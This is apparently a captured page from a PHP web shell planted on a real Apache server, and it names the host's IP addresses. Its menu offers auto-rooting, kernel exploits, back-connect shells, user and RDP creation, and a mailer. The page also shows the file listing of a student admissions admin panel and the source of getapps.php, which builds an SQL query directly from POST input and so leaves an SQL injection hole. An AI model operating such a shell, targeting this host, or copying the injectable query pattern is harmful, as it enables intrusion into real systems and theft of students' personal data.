Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.226.248.17
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
phdadm /
admin /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
connection.php
680
B
-rwxr-xr-x
createUser.php
1.1
KB
-rwxr-xr-x
dashboard.php
2.12
KB
-rwxr-xr-x
database.php
296
B
-rwxr-xr-x
examapp.php
3.19
KB
-rwxr-xr-x
examapp_iframe.php
280
B
-rwxr-xr-x
getapps.php
832
B
-rwxr-xr-x
getautofill.php
738
B
-rwxr-xr-x
login.php
326
B
-rwxr-xr-x
logout.php
155
B
-rwxr-xr-x
profile.php
629
B
-rwxr-xr-x
results.php
640
B
-rwxr-xr-x
saveapps.php
541
B
-rwxr-xr-x
savestuddet.php
569
B
-rwxr-xr-x
studdet.php
2.79
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getapps.php
<?php include ("database.php"); $fromdeg = $_POST['fromdeg']; $todeg = $_POST['todeg']; $fromapp = $_POST['fromapp']; $toapp = $_POST['toapp']; $year = $_POST['year']; $get_app_query = "select fappno, fappno, fname, ffatname, concat(sa.fdegree,'-',dg.fdescpn) as degree, sa.ftotfee, sa.fpaymenttype, ifnull(fapprstatus,'') as fapprstatus, ifnull(sa.fapprusername,'') as fuser from studadm sa inner join degree dg on sa.fdegree = dg.fdegree and sa.fexamno = dg.fexamno where sa.fdegree between '{$fromdeg}' and '{$todeg}' and sa.fappno between '{$fromapp}' and '{$toapp}' and sa.fexamno = '{$year}'"; $result = mysqli_query($conn,$get_app_query); $i=0; while($app = mysqli_fetch_array($result,MYSQLI_NUM)) { $apps[$i] = $app; $i++; } $row['apps'] = $apps; $row['status'] = 'success'; echo json_encode($row);
Close